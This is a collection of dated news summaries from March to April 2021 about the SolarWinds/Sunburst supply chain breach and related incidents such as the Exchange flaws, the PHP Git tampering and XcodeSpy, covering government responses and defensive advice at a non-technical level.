The recent SolarWinds attack (known as Sunburst) has shone a light on the controls required after a breach, with affected organizations laser-focused on what happened and what next. But the same controls that can help remediate the risks posed by this serious supply chain threat can also help prevent or limit the effect of this and other attacks before they happen.
Ref - Accenture
_______________________________________________________________________________________
(April 1, 2021)
The U.S. officials are drawing attention to the supply chain attacks
The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations by sneaking malicious code into widely used software. The NCSC said it plans to issue guidance throughout the month about how specific sectors, like health care and energy, can protect themselves.
Ref - StarTribune
_______________________________________________________________________________________
(April 1, 2021)
The SolarWinds hack severity perception increased over time
(ISC)² has published the results of an online survey of 303 cybersecurity professionals on the SolarWinds Orion software breach. In which, 86% of respondents rated the breach “very” or “extremely severe” when they first learned about it. However, roughly six weeks after the incident was reported, as more details emerged, the number of respondents who indicated that the breach was “severe” increased from 51% to 55%.
Ref - Help Net Security
_______________________________________________________________________________________
(April 1, 2021)
A report with detailed analysis of SolarWinds hacking tools
US Cyber Command and the Department of Homeland Security (DHS) are preparing to release a detailed analysis of the hacking tools used in the SolarWinds attack, which targeted multiple federal agencies and private firms last year. The report was originally scheduled to be released on Wednesday, but the DHS delayed it without explanation. However, it's still expected to be published soon.
Ref - Computing
_______________________________________________________________________________________
(April 1, 2021)
DHS chief announces cybersecurity plan in wake of SolarWinds attacks
Homeland Security Secretary Alejandro Mayorkas warned that cyber threats are coming dangerously close to threatening people’s lives as he announced a series of sprints designed to counter online attacks. The series includes 60-day sprints, each focused on the most important and most urgent priorities needed to achieve goals.
Ref - Yahoo
_______________________________________________________________________________________
(March 31, 2021)
The SolarWinds breach is a wake-up call for the security community
The next time a SolarWinds-class attack occurs, the steps toward a successful response are already defined. As it includes, understanding potential concentration risks may involve delving into third-party liabilities and obligations, or categorizing vendors, and understanding the scope of the larger supplier ecosystem. By defining potential sources of this risk, it becomes possible to build mitigation strategies into incident response plans.
Ref - Deloitte
_______________________________________________________________________________________
(March 30, 2021)
Executive order with 'a dozen' actions forthcoming after SolarWinds, Microsoft breaches
The Biden administration is working on “close to a dozen” action items to be included in an upcoming executive order meant to strengthen federal cybersecurity in the wake of two major breaches. The comments were made as the Biden administration continues to grapple with the fallout from both the recent attacks.
_______________________________________________________________________________________
(March 30, 2021)
Infosec community is concerned about SolarWinds hack
The severity of a data breach typically jumps in the short term and decreases as time progresses. But, according to a survey by International Information System Security Certification Consortium, or (ISC)2, the 2020 SolarWinds incident bucked that trend in the eyes of cybersecurity professionals. A month and a half after the incident was reported, the number of respondents who indicated the breach was “severe” increased from 51% to 55%.
Ref - Bitdefender
_______________________________________________________________________________________
(March 30, 2021)
Details about the second elusive attack targeting SolarWinds software
Details about the scope and victims of Supernova, which exploited a flaw in SolarWinds' Orion network management software, so far have been scarce. Less than a handful of victims have been known to be targeted, and an investigation into the breach of one of those victims led to researchers at Secureworks tying the Supernova attacks to a previously unknown Chinese nation-state group they dubbed "Spiral."
Ref - DarkReading
_______________________________________________________________________________________
(March 30, 2021)
SolarWinds breach lead to distrust of software in use
Security experts say because enterprises can't inspect the inner workings of the software they buy, they're at the mercy of software companies' security practices. In SolarWind attacks, attackers infected the software that is trusted by organizations. And that software became a way to steal confidential information. This breach of trust of software is huge because software is driving everything around tech firms.
Ref - Tech Republic
_______________________________________________________________________________________
(March 30, 2021)
Trump administration emails were compromised in SolarWinds breach
An Associated Press report found that the head of DHS and the department's cyber-security staff were among the accounts exposed during the SolarWinds hack. Email accounts belonging to members of the Trump administration's Department of Homeland Security, including the head of the department, were reportedly compromised by suspected Russian hackers, according to the report.
Ref - Yahoo
_______________________________________________________________________________________
(March 29, 2021)
Key lessons from Sunburst
The cyber domain is a realm of intense interconnectivity that underpins much of daily life and national security. The discovery late in 2020 that Sunburst malware had infected not only thousands of private networks but also US government agencies, led some spectators to embrace alarmist views of this event as the first step in a full-fledged cyberwar.
_______________________________________________________________________________________
(March 29, 2021)
PHP's Git server hacked in a recent supply chain attack
In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if these were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov.
Ref - Bleeping Computer
_______________________________________________________________________________________
(March 29, 2021)
SolarWinds breach got emails of top DHS officials
Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries. The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff are not publicly known.
Ref - AP News
_______________________________________________________________________________________
(March 29, 2021)
Need of a new alert system for cybersecurity
America needs a national cyber vulnerability early warning center after the recent SolarWinds breach. Just as a meteorologist is constantly on the lookout for storm systems, an early warning center would search widely used software and hardware components for vulnerabilities. It would discover new weaknesses before opponents, fortifying defenses and increasing the costs of mounting an attack.
Ref - The Wall Street Journal
_______________________________________________________________________________________
(March 29, 2021)
SolarWinds patches four new vulnerabilities in the Orion platform
SolarWinds released fixes for four new vulnerabilities in their Orion platform, the most severe of which is an authenticated remote code execution flaw due to a JSON deserialization weakness. Fixes for these weaknesses are in Orion Platform 2020.2.5.
_______________________________________________________________________________________
(March 26, 2021)
SolarWinds hackers copied a limited number of source code repositories - Mimecast
A forensic investigation conducted by Mimecast and FireEye Mandiant incident response division found that SolarWinds hackers downloaded a limited number of the company’s source code repositories.
_______________________________________________________________________________________
(March 26, 2021)
Software security is the top priority - SolarWinds CEO
SolarWinds has launched a Secure by Design initiative in response to the recent cybersecurity attack. This project is designed to build security into the design phase of software development and to make security an ongoing priority instead of an after-the-fact priority. The company is testing a design process that uses several parallel build chains simultaneously to create software instead of just one.
_______________________________________________________________________________________
(March 26, 2021)
Lessons learned from the SolarWinds breach
A system like SolarWinds should have security checks built in from the start and the use of software signing keys should always be closely monitored. In addition, organizations need to adopt a zero-trust policy, stay vigilant, and create a security culture to prevent complex attacks like this.
Ref - Forbes
_______________________________________________________________________________________
(March 25, 2021)
Strategies to guard against email fraud in supply chain
Proofpoint has provided six recommendations to protect supply chain relationships: knowing who the suppliers are, considering the "spider web," creating more vendor accountability, being responsive to security-conscious users, relying more on automation, and finally implementing DMARC at the gateway.
Ref - Proofpoint
_______________________________________________________________________________________
(March 25, 2021)
SolarWinds breach - Key learnings
Security experts identified several critical learnings from SolarWinds breach: Threat hunting and threat intelligence built on artificial intelligence and machine learning; Comprehensive detection with real-time continuous monitoring; Simplified incident response infrastructure that is capable of detecting attacks, containing the damage, and restoring systems and data; Agile, integrated, and automated security technology; Dynamic remediation strategies designed to quickly return business operations to a trusted state
Ref - OpenText
_______________________________________________________________________________________
(March 25, 2021)
Fed breach disclosure rule after SolarWinds breach
An executive order in the wake of the SolarWinds hack will require software vendors and service providers to notify their U.S. government clients if they experience a security breach. Major software companies like Microsoft and Salesforce that sell to the government would be affected by the executive order.
Ref - CRN
_______________________________________________________________________________________
(March 25, 2021)
Fresh code execution flaws in the Solarwinds Orion platform
Solarwinds has shipped a major security update to fix at least four documented security vulnerabilities, including a pair of bugs that are exploited for remote code execution attacks. The patches were pushed out as part of a minor security makeover of the Orion Platform, the same compromised Solarwinds product that was exploited in recent nation-state software supply chain attacks.
Ref - SecurityWeek
_______________________________________________________________________________________
(March 25, 2021)
SolarWinds making changes in the build process after the hack
SolarWinds’ chief executive said the software provider made a series of changes to its build process and board room reporting structure in an effort to prevent another supply chain attack like the one experienced by the company. The company is also taking a series of actions designed to boost the profile of cybersecurity in business decisions and increase the autonomy of its chief information security officer and CIO shops.
Ref - SC Media
_______________________________________________________________________________________
(March 25, 2021)
Some powerful tactics to prevent supply chain attacks
Upguard recommends some defense tactics that organizations can implement to significantly decrease the chances of a supply chain attack. This includes implementing Honeytokens, securing privileged access management, implementing a Zero-Trust architecture, and assuming a breach mindset when preparing the security strategy.
_______________________________________________________________________________________
(March 25, 2021)
‘Trust no one’ becomes cyber mantra after massive hacking attacks
In the wake of two massive cyberattacks that exposed glaring deficiencies in U.S. defenses, government officials and cybersecurity practitioners are saying zero-trust may be the way to stop the cyber mayhem. Zero-trust reduces or prevents lateral movement and privilege escalation.
_______________________________________________________________________________________
(March 24, 2021)
Securing the software development build using secure design
SolarWinds SVP, Engineering Lee McClendon, KPMG Director of Cyber Security Services Caleb Queern, and Head Geek Thomas LaRock provide insights on how SolarWinds is prioritizing security in its software build environment, and what the entire industry can learn about next-generation software development.
_______________________________________________________________________________________
(March 24, 2021)
SolarWinds attack and other threats indicate increased nation-state activity
Cyber attacks launched by nation-states are becoming more proficient and aggressive. This was the message from Admiral (ret.) Michael S. Rogers at the NetDiligence Cyber War Webinar Series. He said that the breadth of activity has now changed with the SolarWinds attack in December 2020 and the attack on Microsoft Exchange this month, both arguable evidence of increased nation-state activity.
Ref - Yahoo
_______________________________________________________________________________________
(March 23, 2021)
Attackers can abuse OAuth authentication apps used in the SolarWinds breach
Given the broad permissions they can have to your core cloud applications, OAuth apps have become a growing attack surface and vector. Attackers use various methods to abuse OAuth apps, including compromising app certificates, which was also used in the SolarWinds / Solorigate campaign. Attackers can use OAuth access to compromise and take over cloud accounts. Until the OAuth token is explicitly revoked, the attacker has persistent access to the user’s account and data.
Ref - Proofpoint
_______________________________________________________________________________________
(March 23, 2021)
SolarWinds breach is one of the most challenging hacking incidents
The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack. The acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA) Brandon Wales has called it the most complex and challenging hacking incident the agency has come up against.
Ref - CyberArk
_______________________________________________________________________________________
(March 23, 2021)
Microsoft proposes incentivizing digital solutions to mitigate supply chain risk
The first step in strengthening supply chain security is to carefully identify the risks. Once those risks are identified, the industry can then work with the government to define risk-mitigating best practices and tailored technology-enabled solutions. Technology may not eliminate the need for more traditional restrictive measures in all contexts. But in many areas, technology-enabled solutions can both strengthen security and sustain tech leadership.
Ref - Microsoft
_______________________________________________________________________________________
(March 22, 2021)
The ‘Frankencloud’ model is the biggest security risk
According to a researcher, the information technology environments evolve into the “Frankenstein” approach. Firms scrambled to take advantage of the cloud while maintaining their systems of record. This led to systems riddled with complexity and disconnected parts put together.
Ref - TechCrunch
_______________________________________________________________________________________
(March 22, 2021)
The SolarWinds victims are now solidified
Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, said that the list of victims from the attack on SolarWinds Orion has "solidified" and he is not expecting many more organizations to come forward. CISA is continuing to work with federal agencies to understand if any have been compromised.
Ref - FCW
_______________________________________________________________________________________
(March 22, 2021)
A report about SilverFish cyber-espionage group
The PRODAFT Threat Intelligence Team has published a report that gives an unusually clear look at the size and structure of organized cybercrime. It uncovered a global cybercrime campaign that uses modern management methods, sophisticated tools including its own malware testing sandbox. It has strong ties with the SolarWinds attack, the EvilCorp group, and some other well-known malware campaigns.
Ref - Malwarebytes
_______________________________________________________________________________________
(March 22, 2021)
Shell is another victim of the Accellion supply chain hack
Energy giant Shell has disclosed a data breach (via Supply Chain attack) after attackers compromised the company's secure file-sharing system powered by Accellion's File Transfer Appliance (FTA). Upon learning of the incident, the firm - Shell - addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.
Ref - Bleeping Computer
_______________________________________________________________________________________
(March 22, 2021)
The new insider threat of compromised partners
The current rash of financial fraud and supply chain attacks exploit a seemingly unsolvable vulnerability in security strategy. Attackers exploit the fact that a firm must communicate with its outside partners and vendors to thrive as a company or an institution. As they interact with partners, the door to exploitation opens, specifically in the form of supply chain attacks. These attacks are tremendously hard to detect since malware and malicious links are not necessary for successful exfiltration.
Ref - DarkReading
_______________________________________________________________________________________
(March 22, 2021)
Three vulnerabilities exposed during SolarWinds attack
SolarWinds attackers leveraged three key vulnerabilities in the current IT ecosystem. They leveraged the supply chain weakness, injecting malware in the supplier network to gain access to the core network. Besides, they took advantage of single sign-on systems, and also exploited the traditional multifactor authentication systems.
_______________________________________________________________________________________
(March 22, 2021)
In wake of SolarWinds, Exchange attacks, the U.S. government calls for better information sharing
The new cybersecurity leadership in the Biden White House is brainstorming methods to establish new early warning systems that combine traditional intelligence agency methods with private sector expertise. Reportedly chief among the new approaches is establishing more profound information-sharing methods with the private sector.
_______________________________________________________________________________________
(March 22, 2021)
KPMG advisory on SolarWinds attack
According to the recent KPMG advisory, each malware used during SolarWinds had a tactical purpose. SUNSPOT was designed by the threat actor(s) to function specifically within SolarWinds’ software build environment to insert a malicious backdoor called SUNBURST. TEARDROP and RAINDROP were designed to be used by the threat actor(s) to deploy a modified version of Cobalt Strike. Further, SUNSHUTTLE/GoldMax, GoldFinder, and Sibot are malicious tools reported to have been used by threat actor(s) in an environment where there was a pre-existing SUNBURST compromise.
Ref - KPMG
_______________________________________________________________________________________
(March 21, 2021)
How to prevent supply chain attacks?
The key to mitigating supply chain security risks is to ensure each of your third-party vendors is compliant with the strictest of cybersecurity standards, whether or not regulatory requirements are enforced. Complacency is the primary impetus to supply chain attack vulnerability. To keep third-party vendors compliant, security questionnaires should be sent to each of them on a regular basis to continuously scrutinize their security posture.
Ref - UpGuard
_______________________________________________________________________________________
(March 21, 2021)
CISA releases a tool to detect SolarWinds malicious activity
The U.S. CISA has released a new tool (CISA Hunt and Incident Response Program or CHIRP) that allows detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments. It is a forensics collection tool that CISA developed to help network defenders find IOCs associated with activity detailed in the following CISA Alerts.
Ref - Security Affairs
_______________________________________________________________________________________
(March 20, 2021)
SolarWinds is a major disaster in the modern era of computing
Researcher Davi Ottenheimer has compared the SolarWinds attack with a Dust Bowl disaster. According to him, Microsoft for so many years worked on an extremely expedited model with minimal security or ecosystem investment inviting a predictable disaster.
Ref - Security Boulevard
_______________________________________________________________________________________
(March 20, 2021)
A Swiss firm has accessed servers of a SolarWinds hacker
A Swiss cybersecurity firm says it has accessed servers used by a hacking group (Silverfish) tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation. The firm, PRODAFT, also said the hackers have continued with their campaign through this month.
Ref - ProDaft
_______________________________________________________________________________________
(March 18, 2021)
Xcode Project spreading MacOS malware to Apple developers
Cybercriminals are targeting Apple developers with a trojanized Xcode project, which once launched installs a backdoor that has spying and data exfiltration capabilities. The malicious Xcode project, which researchers call XcodeSpy, installs a variant of the known EggShell backdoor on the developer’s macOS computer.
Ref - Threatpost
_______________________________________________________________________________________
(March 18, 2021)
CISA releases detection tool for SolarWinds malicious activity
The Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to detect post-compromise malicious activity associated with the SolarWinds hackers in on-premises enterprise environments. CISA Hunt and Incident Response Program (CHIRP), the new forensics collection tool, is a Python-based tool that helps detect SolarWinds malicious activity IOCs on Windows operating systems.
Ref - Bleeping Computer
_______________________________________________________________________________________
(March 18, 2021)
SolarWinds-linked threat group SilverFish took advantage of enterprise victims
A Swiss cybersecurity firm Prodaft said that SilverFish, a threat group, has been responsible for intrusions at over 4,720 private and government organizations including Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers. SilverFish has been connected to the recent SolarWinds breach as "one of many" threat groups taking advantage of the situation.
Ref - ZDNet
_______________________________________________________________________________________
(March 18, 2021)
Beware the Package Typosquatting Supply Chain Attack
Attackers are mimicking the names of existing packages on public registries in hopes that users or developers will accidentally download these malicious packages instead of legitimate ones. In this attack, the attacker tries to mimic the name of an existing package on a public registry in hopes that users or developers will accidentally download the malicious package instead of the legitimate one.
Ref - DarkReading
_______________________________________________________________________________________
(March 18, 2021)
XcodeSpy malware can target iOS devs in a supply chain attack
A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply chain attack to install a macOS backdoor on the developer's computer. Like other development environments, it is common for developers to create projects that perform specific functions and share them online so that other developers can add them to their own applications.
Ref - Bleeping Computer
_______________________________________________________________________________________
(March 18, 2021)
NSA, Homeland Security push service to mitigate cyber-attacks
The National Security Agency and the Department of Homeland Security are encouraging government agencies and high-risk companies to embrace a system known as Protective DNS, in which a private security firm would monitor and filter web traffic. PDNS blocked connections to malicious websites millions of times in a recent test involving five U.S. defense contractors.
Ref - Bloomberg
_______________________________________________________________________________________
(March 18, 2021)
Will the U.S. never be safe from cyberattacks?
While Washington grapples with how to prevent another attack of this scale (SolarWinds breach), the hard truth is this: There’s no such thing as a foolproof cybersecurity defense. Because human beings write computer code. And despite being incredibly smart, those people make mistakes. And each minuscule error creates one more pathway for hackers to launch cyberattacks.
Ref - Yahoo
_______________________________________________________________________________________
(March 18, 2021)
Rethinking Patch management after SolarWinds breach
The SolarWinds breach, in which hackers inserted malware into software updates sent to thousands of customers and created a backdoor to their IT systems, suggests organizations need to rethink patch management. To identify known and potential vulnerabilities, security leaders need a software bill of materials (SBOM) for software and devices deployed into their environment, as well as for new updates and patches.
Ref - Security Boulevard
_______________________________________________________________________________________
(March 17, 2021)
Zero-trust helped Splunk dodge supply chain attack
Events like the SolarWinds breach are reminders of how important it is for organizations, especially high-profile organizations in industry and government to have a zero-trust architecture in place. A lot of organizations are building out a very in-depth set of data analytics capabilities, as a part of a broader zero-trust strategy. And then taking advantage of those things to improve visibility and security operations.
Ref - CyberScoop
_______________________________________________________________________________________
(March 17, 2021)
SolarWinds attackers gained access to Mimecast’s production environment
Mimecast acknowledged that the threat actor responsible for the SolarWinds attack used the supply chain compromise to gain entry to a part of Mimecast’s production grid environment, accessing certain Mimecast-issued certificates and related customer-server-connection information.
Ref - SC Media
_______________________________________________________________________________________
(March 17, 2021)
Lawmakers drilled multiple agencies for SolarWinds attack
The bipartisan leaders of a House panel drilled multiple agencies for updates on the SolarWinds hack, a mass cyber campaign that compromised at least nine federal agencies and 100 private sector groups. Members of the Energy and Commerce Committee sent letters demanding answers to the leaders of the departments of Commerce, Energy, Health and Human Services, as well as the Environmental Protection Agency.
Ref - The Hill
_______________________________________________________________________________________
(March 17, 2021)
Spotting APT Activity associated with SolarWinds and Active Directory/M365 Compromise
CISA has released a table of tactics, techniques, and procedures used by the advanced persistent threat (APT) actor involved with the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify APT TTP and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.
Ref - CISA
_______________________________________________________________________________________
(March 17, 2021)
Key takeaways for security admins from SolarWinds attacks
Security and IT admins can take note of several key points regarding supply chain attacks. It can be said that potential supply chain attack victims lack access to the right tools. The golden SAML attack allowed attackers to jump from on-premises systems to cloud systems effectively bypassing MFA, thus showing the weaknesses in current authentication systems.
_______________________________________________________________________________________
(March 17, 2021)
How the Linux Foundation’s software signing combats supply chain attacks
The Linux Foundation is launching sigstore, a free service jointly developed with Google, Red Hat, and Purdue University, that software developers can use to digitally sign their software releases. sigstore protects open source consumers from such attacks as dependency confusion attacks. These attacks dupe package managers into installing a remotely-hosted malicious version of a locally-available resource such as a library file.
_______________________________________________________________________________________
(March 16, 2021)
Biden's supply chain EO may uncover these cyber risks
While the government continues to assess the scope and scale of that breach, the White House is now directing various executive departments to assess the risks in their respective supply chains. The executive order calls for both 100-day immediate reviews of certain products, as well as year-long sectoral supply chain reviews of the defense, health, transportation, and agriculture industries, among others.
_______________________________________________________________________________________
(March 16, 2021)
Mimecast decommissioned SolarWinds Orion after hack
The Lexington, Mass.-based email security vendor - Mimecast - became one of the first SolarWinds hack victims to publicly announce they’re dumping the industry-leading Orion network monitoring platform for a competing product. Industry experts had considered it unlikely that the hack would lead to many customers getting rid of SolarWinds due to the unique visibility and monitoring features Orion offers.
Ref - CRN
_______________________________________________________________________________________
(March 16, 2021)
SolarWinds underestimated network’s role in security
According to Juniper Networks VP of Security Business and Strategy Samantha Madrid, the SolarWinds hack has put a fine point on the importance of network security. While the full scope of the supply chain attack remains under investigation, it brought network visibility and the need for security enforcement at every point of connection into sharper focus.
Ref - SDxCentral
_______________________________________________________________________________________
(March 16, 2021)
Using CodeQL to spot traces of Solorigate
If a build server is backdoored with the build hijacking component of the Solorigate malware campaign, the malware will inject additional source code at compilation time. If CodeQL is observing the build process on the infected server, it will extract the injected malicious source code together with the genuine source code. The resulting CodeQL database will therefore contain traces of the malicious Solorigate source code.
Ref - GitHub
_______________________________________________________________________________________
(March 16, 2021)
Mimecast confirms that SolarWinds hackers used Sunburst malware for initial intrusion
Mimecast has confirmed that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion. Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information.
_______________________________________________________________________________________
(March 16, 2021)
How to prevent supply chain attacks?
Here are 11 cybersecurity strategies that could help prevent supply chain attacks - implement honeytokens, secure privileged access management, implement a Zero trust architecture, assume about suffering a data breach, identify all potential insider threats and protect vulnerable resources, minimize access to sensitive data, implement strict shadow IT rules, send regular third-party risk assessments, monitor vendor network for vulnerabilities, and identify all vendor data leaks.
Ref - UpGuard
_______________________________________________________________________________________
(March 16, 2021)
Software supply chain attacks are not easy to tackle
As companies scramble to investigate whether their own systems and data were potentially impacted by the SolarWinds compromise, executives, boards, and customers are discovering that the threat of supply chain attacks expands beyond this one single incident and that mitigating the risks associated with them is not straightforward.
Ref - CSO Online
_______________________________________________________________________________________
(March 15, 2021)
Security ratings could raise the bar on cyber hygiene
Plans from the Biden administration to release a product security rating system could raise the bar for security overall but won’t likely prevent the next SolarWinds or Microsoft hacks. Experts say the simplicity of that concept is both its strength and its weakness: it’s a concept that is easy to understand and could drive compliance with a set of standards, but it won’t prevent more sophisticated attacks.
Ref - SCMagazine
_______________________________________________________________________________________
(March 15, 2021)
Better security approach against supply chain attacks
An effective procurement language should be developed, which is designed to hold a supplier or other third party contractually liable for the statements they make about the quality, reliability, and security of the software they are providing. Organizations need to consider the software and service provider processes when discussing a partnership and defining what security measures will be implemented.
Ref - Medium
_______________________________________________________________________________________
(March 15, 2021)
TIA reveals new global supply chain security standard - SCS 9001
The Telecommunications Industry Association (TIA) has published a new white paper on SCS 9001, the first process-based supply chain security standard for the information communications technology (ICT) industry. Scheduled to release later this year, the new standard will be measurable and verifiable as a means for service providers, manufacturers, and vendors to ensure that their supply chains meet the critical requirements needed to mitigate the risk of cybersecurity breaches and attacks.
_______________________________________________________________________________________
(March 15, 2021)
SolarWinds attacks recovery could take the U.S. government 18 months
Brandon Wales, acting director of CISA, said that the U.S. government’s recovery effort from the SolarWinds supply chain attack could take well into 2022. This prediction reflects the complex nature of the breach and the length of time during which the attackers hid in their victims’ networks.
_______________________________________________________________________________________
(March 14, 2021)
White House seeks new cybersecurity approach after failing to detect hacks
The sophisticated hacks pulled off by Russia and China against a broad array of government and industrial targets in the United States and the failure of the intelligence agencies to detect them are driving the Biden administration and Congress to rethink how the nation should protect itself from growing cyber threats. Both attacks were run from inside the USA’s domestic servers, putting them out of reach of the NSA’s early warning system.
Ref - The New York Times
_______________________________________________________________________________________
(March 14, 2021)
Software Bill Of Materials: an efficient mitigation strategy for supply chain attacks
There is an efficient mitigation strategy for supply chain attacks: the bill of materials, or “BOM”. In its simplest form, the BOM is similar to a long list of ingredients, in which all materials and quantities needed to manufacture an end product are listed. If the “BOM” is done with great precision, it is possible to provide deep insight into the product and all its parts and its corresponding supply chain vulnerabilities.
Ref - Medium
_______________________________________________________________________________________
(March 13, 2021)
Security best practices after SolarWinds supply chain attack
Implementing the supply chain security best practices can help mitigate third-party risk and meet the needs of the changing enterprise ecosystem. Users are recommended to conduct asset and access inventories, elevate third-party risk management and ensure third-party relationships are collaborative.
Ref - TechTarget
_______________________________________________________________________________________
(March 12, 2021)
A senior administration official on the response to the Microsoft and SolarWinds intrusions
According to a senior administration official, they are in week three of four-week remediation across the federal government. The compromised agencies were all tasked to do a particular set of activities and then were tasked to have an independent review of their work to ensure the adversary had been eradicated. Most of the agencies have completed that independent review and the rest will complete it by the end of March.
Ref - White House
_______________________________________________________________________________________
(March 12, 2021)
SolarWinds and Microsoft hacks spark debate over western retaliation
Cyber experts have cautioned that retaliation steps against SolarWinds and Microsoft hacks may not be justified. The SolarWinds and Microsoft hacks are not incidences of conflict in any sort of conventional sense, they’re espionage, so they’re part of continual interaction between these states.
_______________________________________________________________________________________
(March 12, 2021)
The first-ever U.S. national cyber director after SolarWinds breach
The new national cyber director will be responsible for crafting a national cyber strategy as well as driving more consistency across civilian government networks. If disaster strikes, the director will serve as the point person in coordinating the government’s nonmilitary response.
Ref - Fortune
_______________________________________________________________________________________
(March 11, 2021)
Risks of supply chain attacks for organizations
Supply chain security risks are not new, but recent headlines are a reminder for consumers to re-examine their security practices. The SolarWinds/Orion cyberattack had impacted more than 18,000 organizations, and it might serve as the major point of attention for dealing with digital supply chain risks.
Ref - Synopsys
_______________________________________________________________________________________
(March 11, 2021)
Managing supply chain security risk
After the SolarWinds attack, it is important that information security and risk management teams need to think beyond third-party and vendor risk management. Supply chain risk management should be built on existing standardized practices across many existing risk practices and disciplines. It also requires cooperation and collaborative relationships within all areas of the organization.
Ref - TechTarget
_______________________________________________________________________________________
(March 11, 2021)
Embedded devices are a blind spot in the SolarWinds attack
The SolarWinds attackers accessed the network, be it Office 365 or VMware, and a separate campaign that exploited a bug in SolarWinds. However, the industry is overlooking a more nefarious but equally plausible objective: Attackers may have used SolarWinds as a pathway into key networks where they could access and burrow deep into the embedded devices in industrial control systems.
Ref - The Hill
_______________________________________________________________________________________
(March 11, 2021)
Nation-state hackers exploited the U.S. Internet security gap
U.S. lawmakers and security experts are voicing concern that foreign governments are staging cyberattacks using servers in the U.S., in an apparent effort to avoid detection by America’s principal cyberintelligence organization. When hackers recently targeted servers running Microsoft Corp.’s Exchange software, they employed U.S.-based computers from at least four service providers to mount their attack, according to an analysis by the threat intelligence company DomainTools LLC.
Ref - The Wall Street Journal
_______________________________________________________________________________________
(March 10, 2021)
Risks of integrating technology vulnerabilities into the foundational technology
SolarWinds attacks and other events in 2020 spotlight a new burden to manage for C-Suites/Boards: The malicious supply chain influences of nation-state intelligence services. In recent supply chain attacks, the adversaries are not just finding & exploiting technology vulnerabilities, but actually creating & integrating them into the foundational technology.
Ref - Forbes
_______________________________________________________________________________________
(March 10, 2021)
Hacker group claims access to internal video feeds by compromising supplier
Hackers said they accessed internal video feeds at several companies, including Tesla Inc., and at public agencies by breaching the network of security-camera vendor Verkada Inc., the latest cybersecurity incident in which a supplier unwittingly opened a back door into client networks. The group found a username and password for a Verkada administrative account on the internet, permitting them to obtain the footage.
Ref - The Wall Street Journal
_______________________________________________________________________________________
(March 10, 2021)
How to beat the new breed of Supply Chain attacks
The plethora of new malware strains (e.g., SUNBURST, SUPERNOVA, GoldMax, Sibot, and GoldFinder) that have emerged in the wake of the SolarWinds breach should force all enterprises to take the supply chain attack vector seriously. Comparing traditional supply chain attacks with the recent SolarWinds and Microsoft hacks, it is clear that attackers have upped their game to a whole new level, both in sophistication and tactics.
_______________________________________________________________________________________
(March 10, 2021)
Monitoring the software supply chain in Microsoft environment
Microsoft has described ways to monitor the software development, build, and release process via Azure Sentinel, specifically to detect any NOBELIUM-related activity. The blog uses Microsoft’s security monitoring solution Azure Sentinel, and Microsoft’s cloud CI/CD solution Azure DevOps as the focus point, however, the monitoring principles and approaches could also be applied to other technology stacks.
_______________________________________________________________________________________
(March 10, 2021)
SolarWinds is not an isolated event going forward - VMware Report
The 2021 Global Cybersecurity Outlook report from VMware Security Business Unit suggests that “island-hopping” attacks are on a rise, in which attackers jump from one network to another along a supply chain, as occurred in the SolarWinds attack. Organizations have to realize that it’s no longer simply about whether breaches along their supply chains can be leveraged to attack them, but whether they themselves can be used to attack their customers.
_______________________________________________________________________________________
(March 9, 2021)
The inside story of the stealthy SolarWinds SUNBURST attack
The SolarWinds attack was performed without weaponizing a (yet known) zero-day vulnerability. The attackers were able to make their malicious version of the SolarWinds Orion DLL look like a normal version of the software. It was virtually impossible to detect because everything looked official. But as they begin to move through a network by accessing new accounts, a lack of normal behavior of all these targeted users and devices they’re operating opens a new window of opportunity for detection.
_______________________________________________________________________________________
(March 9, 2021)
The separate SolarWinds attack described by researchers
Russian hackers apparently weren't the only ones targeting SolarWinds customers. Researchers from Secureworks discovered the ‘Spiral’ attack on one organization in November 2020, when they spotted hackers exploiting a SolarWinds Orion API vulnerability on an internet-facing SolarWinds server during an incident response effort. Spiral's activities are separate from the SolarWinds supply chain compromise first reported in December 2020
Ref - BankInfoSecurity
_______________________________________________________________________________________
(March 9, 2021)
Microsoft released a patch for older versions of Exchange
Microsoft has released security updates for unsupported versions of Exchange email servers following widespread attacks exploiting four newly discovered security vulnerabilities. The security updates for older versions of Exchange only address the four newly disclosed flaws that are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The issues affect on-premise Exchange servers.
Ref - ZDNet
_______________________________________________________________________________________
(March 9, 2021)
Implications of recent supply chain attacks
The implications of SolarWinds have made all CSOs rethink their approach to cybersecurity. For decades, manufacturing equipment would operate in isolation from public networks to keep adversarial agents from gaining access and potentially disrupting operations. However, as supply chains became more intertwined with operations, third parties were granted access to those systems in order to automate the ordering and fulfillment of maintenance and materials.
Ref - Forbes
_______________________________________________________________________________________
(March 9, 2021)
Analysis of the biggest Python supply chain attack ever
On March 1st, 2021, a newly created account on the Python Package Index PyPI uploaded 3591 new packages. Each package had a name that closely resembled the name of another popular package. However, the script is only signaling to someone that it was successfully downloaded and installed but does nothing beyond that. This could be the work of a security researcher who wanted to raise awareness about typosquatting supply chain attacks, by publishing a lot of fake packages and collecting statistics about how many times each one was downloaded.
Ref - Sogeti
_______________________________________________________________________________________
(March 9, 2021)
More clues appear to link Supernova web shell activity to China
